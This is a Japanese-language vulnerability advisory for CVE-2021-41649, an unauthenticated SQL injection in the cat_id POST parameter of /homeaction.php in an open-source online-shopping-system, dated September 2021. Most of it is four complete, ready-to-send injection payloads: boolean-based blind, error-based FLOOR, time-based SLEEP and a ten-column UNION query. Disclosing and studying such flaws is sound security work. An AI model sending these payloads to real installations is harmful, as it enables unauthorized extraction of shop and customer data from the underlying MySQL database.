
CVE-2021-41649 online-shopping-system における SQL インジェクション
online-shopping-system は、認証されていないエラーベース/ブールベースのブラインド SQL インジェクションおよびエラーベースの SQL インジェクション攻撃に対して脆弱です。
/homeaction.php ページの cat_id パラメータはユーザー入力をサニタイズしていないため、攻撃者は基盤となる MySQL データベースから機密データを抽出できます。
URL: /homeaction.php
PARAMETER: cat_id
パラメータ: cat_id (POST リクエスト)
タイプ: ブールベースのブラインド
タイトル: AND ブールベースのブラインド - WHERE または HAVING 句
ペイロード: cat_id=4' AND 9760=9760 AND 'ZCfc'='ZCfc&get_seleted_Category=1
タイプ: エラーベース
タイトル: MySQL >= 5.0 AND エラーベース - WHERE、HAVING、ORDER BY または GROUP BY 句 (FLOOR)
ペイロード: cat_id=4' AND (SELECT 4034 FROM(SELECT COUNT(*),CONCAT(0x71707a7171,(SELECT (ELT(4034=4034,1))),0x71787a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'sGIO'='sGIO&get_seleted_Category=1
タイプ: タイムベースのブラインド
タイトル: MySQL >= 5.0.12 AND タイムベースのブラインド (クエリ SLEEP)
ペイロード: cat_id=4' AND (SELECT 9762 FROM (SELECT(SLEEP(5)))PAcf) AND 'hpHO'='hpHO&get_seleted_Category=1
タイプ: UNION クエリ
タイトル: 汎用 UNION クエリ (NULL) - 10 列
ペイロード: cat_id=4' UNION ALL SELECT CONCAT(0x71707a7171,0x746e4d4b5a706566596771585179566943487446575673515244507a52507345694d6b5a754d7049,0x71787a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&get_seleted_Category=1

Jason Colyvas
MOBIUSBINARY
2021年9月21日